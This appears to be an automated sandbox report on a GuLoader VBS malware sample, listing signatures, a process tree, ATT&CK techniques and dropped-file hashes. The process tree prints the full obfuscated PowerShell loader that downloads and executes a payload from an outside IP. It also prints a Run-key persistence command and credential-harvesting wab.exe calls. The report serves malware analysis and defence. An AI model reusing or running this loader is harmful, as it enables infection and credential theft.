Overview

overview

10

Static

static

1

Transactio...00.vbs

windows7-x64

10

Transactio...00.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27-06-2024 06:39

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Transaction_Execution_Confirmation_000000.vbs

  • Size

    187KB

  • MD5

    37f090cc76db33c457b77c6b2c6bb13d

  • SHA1

    7c499fca1564ea4fb48cc2b72212bc3f857443ab

  • SHA256

    36e517cbfb12bd2e58446d7ae27d76baf3e454a793e8c629667fe067839ec23f

  • SHA512

    90aeb5b01c9309c49f35541d97f7532ed7a564fee986bf111a6f33bb41339e54f9972368179632ee5d6bdd8840811dc665a56ff5a26b159bbe764279f7be0de3

  • SSDEEP

    3072:VmN8GGebKjeK3ubth+DCFxKCvBB/WnHPP1w/sLJFJ281QIHz1y8mNy7Ey1MgKTZJ:V08GxbKja3+DCbKCvBB/WnHXC/sLJFJW

Score
10/10
guloadercollectiondownloaderpersistence

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Nirsoft 3 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
    collection
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Transaction_Execution_Confirmation_000000.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:316
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Beruselsernes Respectant dulcifluous Brugerfladers Unmobilised Hamperer Preexpectant Cementstberis Iscremers Forstudiets Antenneindgang Uninvokable Preaggravate Sptmejsen Saddukere Apometaboly220 Tractoration Tavsers Gawking Aabningsbillederne Indisputabel Tuberkler Sellary Trunkway111 Beruselsernes Respectant dulcifluous Brugerfladers Unmobilised Hamperer Preexpectant Cementstberis Iscremers Forstudiets Antenneindgang Uninvokable Preaggravate Sptmejsen Saddukere Apometaboly220 Tractoration Tavsers Gawking Aabningsbillederne Indisputabel Tuberkler Sellary Trunkway111';$Concordens = 1;Function Graasteners($Lipoferous){$Tamilers=$Lipoferous.Length-$Concordens;$Skvttende98='SUBSTRIN';$Skvttende98+='G';For( $Ozonospheric=1;$Ozonospheric -lt $Tamilers;$Ozonospheric+=2){$Beruselsernes+=$Lipoferous.$Skvttende98.Invoke( $Ozonospheric, $Concordens);}$Beruselsernes;}function strkningspunkter($Paleothermal){ & ($Visnomy) ($Paleothermal);}$Dynamoers=Graasteners 'TM o.zFiNl l a /F5F. 0, F( W i.n dko wMsH NBT, S1H0m.c0 ; HW iFn 6.4 ;D .x 6 4A;s .r v :,1,2 1F. 0d) PGYeAcUkFo./F2I0 1S0,0C1R0 1F FPi.rKeEfPoPxF/,1S2 1 .,0S ';$Rykindene=Graasteners 'JU.sEeMr -sA.gUeNnSt, ';$Unmobilised=Graasteners 'KhTt t,pF: / /M1 0 3S.O1M9 5S. 2P3F7c. 4,3T/BMMiGnJiTmCu,m,tCrFy kPkSeBtK.tdMeHpDl.oSyG ';$Albatrosen=Graasteners ' >f ';$Visnomy=Graasteners ' i eCxS ';$Skansekldningers='Cementstberis';$Forlagsprotokol = Graasteners ' eGc,hDo. % a,p,pFdFaHtAa % \ P o.s,t eGrAipo r m.o sDt..,HCeCb, &H&s eFc,h.o, WtH ';strkningspunkter (Graasteners ' $TgPldo b a lS: nMoAnUc.oBs m o pTo lDi tpi.s m = (.c,m,dR A/Bc S$,FYo r lIa,g s pDrToStuo,kBoRlC)H ');strkningspunkter (Graasteners '.$Bg,l.oFb aLl.: BSr uDg.e r fCl.a dCe,r,sA= $ U,nSm.oAb.iKl.iOs,e dS..s.pLlNi,t (M$HAUl bSa t rUoesKeSnS) ');strkningspunkter (Graasteners ',[ NSe tI. S eAr,vCiBc eBPBoUi n.t M,aBn.aHg eOrA] :D:sSTe cFu,rMi,t y PKrUo t.o c.oSlB U= a[ NOeZt .TS.eVcSu.r,i t.yOPVr oStPo cBo.lpT ypp.eQ]U:r:GTDlAs 1 2A ');$Unmobilised=$Brugerfladers[0];$stoftilfrsels= (Graasteners ' $Tg lUoPbNa l.: SPu,pFeBrAf oHr m,a lMnJe s sF=BN e.w - O,bEjSeRc.t ,SCyMs,t ebm .SNUe tT.FWPe b.C lSiAe nft');$stoftilfrsels+=$noncosmopolitism[1];strkningspunkter ($stoftilfrsels);strkningspunkter (Graasteners 'B$PS u pPeAr f o r.m aRl n e.s s..SH e a dTe.ros,[L$DR y k.i nRd e n e ]F=.$ D.y n.a mNo e rRs. ');$Naboskab=Graasteners ',$ SSuup eSr.fCoTr mUaNl,n egs sA.JD oSwMnKl o.abd.FSiSl e,(,$ UDnOmYoDbPiIlAiUsBe do,.$wT,u,bNe,rAkKl,e,rM) ';$Tuberkler=$noncosmopolitism[0];strkningspunkter (Graasteners 'T$ng l.oSbKaAl,:fa e n dBr.iAnHg sCfAo r sWl,a g,=C(,TBe smt -IP a,tVhT S$VT u bCeUr kBlRe.rC)M ');while (!$aendringsforslag) {strkningspunkter (Graasteners ',$Ag l oGb,aSl :.MEaUySp oslceI= $etHrKu,e ') ;strkningspunkter $Naboskab;strkningspunkter (Graasteners 'HSKtAa.r,tR-MS l e eGpJ .4O ');strkningspunkter (Graasteners ',$ g lRoSb aTlF:SaCe.n,d.r,iFnFgGsBfKoRrMsPl a gZ=D(ATIeSs tB-,P a.t hS $CT,u bMe r k l e,r )i ') ;strkningspunkter (Graasteners ' $SgBl oGbkaAl : dBu.lAcMi f,lGuOoSu s = $Fg,lAo bLa.ls:OR eMs p e cFtSa nFtL+.+U%C$GB,r uDgReMr,f.l a.dAeDr s .UcdoSuUnst. ') ;$Unmobilised=$Brugerfladers[$dulcifluous];}$Paatnktes=334318;$Bewet=26301;strkningspunkter (Graasteners ' $.g.lHoSb,a lP:FI,s c rHe,mke.rBsS .=K ,G eCtP-PC oAn,tTeGnOt S$.T uVbHeBrRk lDeVr, ');strkningspunkter (Graasteners ' $ g.lBo.b.aCl :SBFa g e fMoDr mFeUnS A=. D[KS.y sMtVeSmU.DCHoSn v e r t ] : :VF,rUo,mPBMa sFeA6.4 S tDr i.nFgC( $MI sMcKrSe m.e rDsT) ');strkningspunkter (Graasteners ' $,g,l.oCbDa lS:,U nTiMnHvSo.kNa.b l eT =, S[FSSyBs t e.m .IT eRxAtP. E n.cCoKdKi nIgU].:F:.A.SPC I IV.eGOeKtDS.t,rCi n.g ( $TB.aAgGeBfEo rCm.e.nL)P ');strkningspunkter (Graasteners ',$ gAlEo.bOa lR:RI c hSnOo.gMrEaZpLh,i,eMs.=T$ U nSi n v oTkEaMb l eS. s u,b.s tCr i.nBg (F$ P a a,t n kAt e sM,A$CBHe.w,e t )A ');strkningspunkter $Ichnographies;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3144
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Posteriormost.Heb && echo t"
        3⤵
          PID:4880
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Beruselsernes Respectant dulcifluous Brugerfladers Unmobilised Hamperer Preexpectant Cementstberis Iscremers Forstudiets Antenneindgang Uninvokable Preaggravate Sptmejsen Saddukere Apometaboly220 Tractoration Tavsers Gawking Aabningsbillederne Indisputabel Tuberkler Sellary Trunkway111 Beruselsernes Respectant dulcifluous Brugerfladers Unmobilised Hamperer Preexpectant Cementstberis Iscremers Forstudiets Antenneindgang Uninvokable Preaggravate Sptmejsen Saddukere Apometaboly220 Tractoration Tavsers Gawking Aabningsbillederne Indisputabel Tuberkler Sellary Trunkway111';$Concordens = 1;Function Graasteners($Lipoferous){$Tamilers=$Lipoferous.Length-$Concordens;$Skvttende98='SUBSTRIN';$Skvttende98+='G';For( $Ozonospheric=1;$Ozonospheric -lt $Tamilers;$Ozonospheric+=2){$Beruselsernes+=$Lipoferous.$Skvttende98.Invoke( $Ozonospheric, $Concordens);}$Beruselsernes;}function strkningspunkter($Paleothermal){ & ($Visnomy) ($Paleothermal);}$Dynamoers=Graasteners 'TM o.zFiNl l a /F5F. 0, F( W i.n dko wMsH NBT, S1H0m.c0 ; HW iFn 6.4 ;D .x 6 4A;s .r v :,1,2 1F. 0d) PGYeAcUkFo./F2I0 1S0,0C1R0 1F FPi.rKeEfPoPxF/,1S2 1 .,0S ';$Rykindene=Graasteners 'JU.sEeMr -sA.gUeNnSt, ';$Unmobilised=Graasteners 'KhTt t,pF: / /M1 0 3S.O1M9 5S. 2P3F7c. 4,3T/BMMiGnJiTmCu,m,tCrFy kPkSeBtK.tdMeHpDl.oSyG ';$Albatrosen=Graasteners ' >f ';$Visnomy=Graasteners ' i eCxS ';$Skansekldningers='Cementstberis';$Forlagsprotokol = Graasteners ' eGc,hDo. % a,p,pFdFaHtAa % \ P o.s,t eGrAipo r m.o sDt..,HCeCb, &H&s eFc,h.o, WtH ';strkningspunkter (Graasteners ' $TgPldo b a lS: nMoAnUc.oBs m o pTo lDi tpi.s m = (.c,m,dR A/Bc S$,FYo r lIa,g s pDrToStuo,kBoRlC)H ');strkningspunkter (Graasteners '.$Bg,l.oFb aLl.: BSr uDg.e r fCl.a dCe,r,sA= $ U,nSm.oAb.iKl.iOs,e dS..s.pLlNi,t (M$HAUl bSa t rUoesKeSnS) ');strkningspunkter (Graasteners ',[ NSe tI. S eAr,vCiBc eBPBoUi n.t M,aBn.aHg eOrA] :D:sSTe cFu,rMi,t y PKrUo t.o c.oSlB U= a[ NOeZt .TS.eVcSu.r,i t.yOPVr oStPo cBo.lpT ypp.eQ]U:r:GTDlAs 1 2A ');$Unmobilised=$Brugerfladers[0];$stoftilfrsels= (Graasteners ' $Tg lUoPbNa l.: SPu,pFeBrAf oHr m,a lMnJe s sF=BN e.w - O,bEjSeRc.t ,SCyMs,t ebm .SNUe tT.FWPe b.C lSiAe nft');$stoftilfrsels+=$noncosmopolitism[1];strkningspunkter ($stoftilfrsels);strkningspunkter (Graasteners 'B$PS u pPeAr f o r.m aRl n e.s s..SH e a dTe.ros,[L$DR y k.i nRd e n e ]F=.$ D.y n.a mNo e rRs. ');$Naboskab=Graasteners ',$ SSuup eSr.fCoTr mUaNl,n egs sA.JD oSwMnKl o.abd.FSiSl e,(,$ UDnOmYoDbPiIlAiUsBe do,.$wT,u,bNe,rAkKl,e,rM) ';$Tuberkler=$noncosmopolitism[0];strkningspunkter (Graasteners 'T$ng l.oSbKaAl,:fa e n dBr.iAnHg sCfAo r sWl,a g,=C(,TBe smt -IP a,tVhT S$VT u bCeUr kBlRe.rC)M ');while (!$aendringsforslag) {strkningspunkter (Graasteners ',$Ag l oGb,aSl :.MEaUySp oslceI= $etHrKu,e ') ;strkningspunkter $Naboskab;strkningspunkter (Graasteners 'HSKtAa.r,tR-MS l e eGpJ .4O ');strkningspunkter (Graasteners ',$ g lRoSb aTlF:SaCe.n,d.r,iFnFgGsBfKoRrMsPl a gZ=D(ATIeSs tB-,P a.t hS $CT,u bMe r k l e,r )i ') ;strkningspunkter (Graasteners ' $SgBl oGbkaAl : dBu.lAcMi f,lGuOoSu s = $Fg,lAo bLa.ls:OR eMs p e cFtSa nFtL+.+U%C$GB,r uDgReMr,f.l a.dAeDr s .UcdoSuUnst. ') ;$Unmobilised=$Brugerfladers[$dulcifluous];}$Paatnktes=334318;$Bewet=26301;strkningspunkter (Graasteners ' $.g.lHoSb,a lP:FI,s c rHe,mke.rBsS .=K ,G eCtP-PC oAn,tTeGnOt S$.T uVbHeBrRk lDeVr, ');strkningspunkter (Graasteners ' $ g.lBo.b.aCl :SBFa g e fMoDr mFeUnS A=. D[KS.y sMtVeSmU.DCHoSn v e r t ] : :VF,rUo,mPBMa sFeA6.4 S tDr i.nFgC( $MI sMcKrSe m.e rDsT) ');strkningspunkter (Graasteners ' $,g,l.oCbDa lS:,U nTiMnHvSo.kNa.b l eT =, S[FSSyBs t e.m .IT eRxAtP. E n.cCoKdKi nIgU].:F:.A.SPC I IV.eGOeKtDS.t,rCi n.g ( $TB.aAgGeBfEo rCm.e.nL)P ');strkningspunkter (Graasteners ',$ gAlEo.bOa lR:RI c hSnOo.gMrEaZpLh,i,eMs.=T$ U nSi n v oTkEaMb l eS. s u,b.s tCr i.nBg (F$ P a a,t n kAt e sM,A$CBHe.w,e t )A ');strkningspunkter $Ichnographies;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1772
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Posteriormost.Heb && echo t"
            4⤵
              PID:3040
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:1896
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "idite" /t REG_EXPAND_SZ /d "%Parcelhusomraades114% -w 1 $Unrealise=(Get-ItemProperty -Path 'HKCU:\Forfordelte\').Selvskrevet;%Parcelhusomraades114% ($Unrealise)"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:396
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "idite" /t REG_EXPAND_SZ /d "%Parcelhusomraades114% -w 1 $Unrealise=(Get-ItemProperty -Path 'HKCU:\Forfordelte\').Selvskrevet;%Parcelhusomraades114% ($Unrealise)"
                  6⤵
                  • Adds Run key to start application
                  • Modifies registry key
                  PID:2384
              • C:\Program Files (x86)\windows mail\wab.exe
                "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\olmbfnjjxmqfuqzkekotqcbeaqxlscgec"
                5⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:3416
              • C:\Program Files (x86)\windows mail\wab.exe
                "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\qfzlg"
                5⤵
                • Accesses Microsoft Outlook accounts
                PID:3132
              • C:\Program Files (x86)\windows mail\wab.exe
                "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\aheegyff"
                5⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:5048

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Initial Access

      Execution

      Persistence

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Privilege Escalation

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Defense Evasion

      Modify Registry

      2
      T1112

      Credential Access

      Discovery

      Query Registry

      1
      T1012

      System Information Discovery

      2
      T1082

      Lateral Movement

      Collection

      Email Collection

      1
      T1114

      Exfiltration

      Command and Control

      Impact

      Resource Development

      Reconnaissance

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4xkph3y1.ica.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit
      • C:\Users\Admin\AppData\Local\Temp\olmbfnjjxmqfuqzkekotqcbeaqxlscgec
        Filesize

        4KB

        MD5

        e9689445546dfde0d7496318bfbef6c8

        SHA1

        824304b951603171084b88d6879f474b77fddcdd

        SHA256

        3e57870283553f2a55d674391c0f2d04f3324b916553c5fe05ea391dab4be00e

        SHA512

        fc3ec8fe99f11bc0a5156a3ebc7746cfc8dfa7526030f30223e9e09b8e23de1e04f77aaa87bed9926c4810ec3de3385e57d6817f416a1dbd64e5ae27c8e3e65f

        Download Submit
      • C:\Users\Admin\AppData\Roaming\Posteriormost.Heb
        Filesize

        469KB

        MD5

        3f23a530f6d6ccaa63bae1e6741b03f6

        SHA1

        363207a5637e5bb7b2a7d7ba933661562cfaf506

        SHA256

        c2fbb6039b145b52d429bcaf5ffb57cc83951c8032e06edfc19bb36dfe5bdede

        SHA512

        b88ecae312e9dbd2dbf409b9097434968999dcf44ddf4257937725682ecb5e233b3a4fb676ebcef5bd36b072bb8feb7f3c7f3c1bcbc0d9b55610287d4bb9da31

        Download Submit
      • memory/1772-23-0x0000000005530000-0x0000000005596000-memory.dmp
        Filesize

        408KB

        Download
      • memory/1772-21-0x0000000004CF0000-0x0000000004D12000-memory.dmp
        Filesize

        136KB

        Download
      • memory/1772-19-0x0000000002260000-0x0000000002296000-memory.dmp
        Filesize

        216KB

        Download
      • memory/1772-20-0x0000000004E20000-0x0000000005448000-memory.dmp
        Filesize

        6.2MB

        Download
      • memory/1772-42-0x00000000085C0000-0x000000000BB74000-memory.dmp
        Filesize

        53.7MB

        Download
      • memory/1772-22-0x00000000054C0000-0x0000000005526000-memory.dmp
        Filesize

        408KB

        Download
      • memory/1772-35-0x0000000005BC0000-0x0000000005C0C000-memory.dmp
        Filesize

        304KB

        Download
      • memory/1772-33-0x00000000055A0000-0x00000000058F4000-memory.dmp
        Filesize

        3.3MB

        Download
      • memory/1772-34-0x0000000005B90000-0x0000000005BAE000-memory.dmp
        Filesize

        120KB

        Download
      • memory/1772-40-0x0000000008010000-0x00000000085B4000-memory.dmp
        Filesize

        5.6MB

        Download
      • memory/1772-36-0x00000000073E0000-0x0000000007A5A000-memory.dmp
        Filesize

        6.5MB

        Download
      • memory/1772-37-0x0000000006120000-0x000000000613A000-memory.dmp
        Filesize

        104KB

        Download
      • memory/1772-38-0x0000000006E50000-0x0000000006EE6000-memory.dmp
        Filesize

        600KB

        Download
      • memory/1772-39-0x0000000006DE0000-0x0000000006E02000-memory.dmp
        Filesize

        136KB

        Download
      • memory/1896-66-0x0000000021280000-0x0000000021299000-memory.dmp
        Filesize

        100KB

        Download
      • memory/1896-69-0x0000000021280000-0x0000000021299000-memory.dmp
        Filesize

        100KB

        Download
      • memory/1896-70-0x0000000021280000-0x0000000021299000-memory.dmp
        Filesize

        100KB

        Download
      • memory/1896-46-0x0000000002120000-0x00000000056D4000-memory.dmp
        Filesize

        53.7MB

        Download
      • memory/3132-56-0x0000000000400000-0x0000000000462000-memory.dmp
        Filesize

        392KB

        Download
      • memory/3132-53-0x0000000000400000-0x0000000000462000-memory.dmp
        Filesize

        392KB

        Download
      • memory/3132-62-0x0000000000400000-0x0000000000462000-memory.dmp
        Filesize

        392KB

        Download
      • memory/3144-44-0x00007FFB3C130000-0x00007FFB3CBF1000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/3144-49-0x00007FFB3C130000-0x00007FFB3CBF1000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/3144-15-0x00007FFB3C130000-0x00007FFB3CBF1000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/3144-5-0x0000020E63920000-0x0000020E63942000-memory.dmp
        Filesize

        136KB

        Download
      • memory/3144-16-0x00007FFB3C130000-0x00007FFB3CBF1000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/3144-43-0x00007FFB3C133000-0x00007FFB3C135000-memory.dmp
        Filesize

        8KB

        Download
      • memory/3144-4-0x00007FFB3C133000-0x00007FFB3C135000-memory.dmp
        Filesize

        8KB

        Download
      • memory/3416-52-0x0000000000400000-0x0000000000478000-memory.dmp
        Filesize

        480KB

        Download
      • memory/3416-54-0x0000000000400000-0x0000000000478000-memory.dmp
        Filesize

        480KB

        Download
      • memory/3416-57-0x0000000000400000-0x0000000000478000-memory.dmp
        Filesize

        480KB

        Download
      • memory/5048-59-0x0000000000400000-0x0000000000424000-memory.dmp
        Filesize

        144KB

        Download
      • memory/5048-55-0x0000000000400000-0x0000000000424000-memory.dmp
        Filesize

        144KB

        Download
      • memory/5048-58-0x0000000000400000-0x0000000000424000-memory.dmp
        Filesize

        144KB

        Download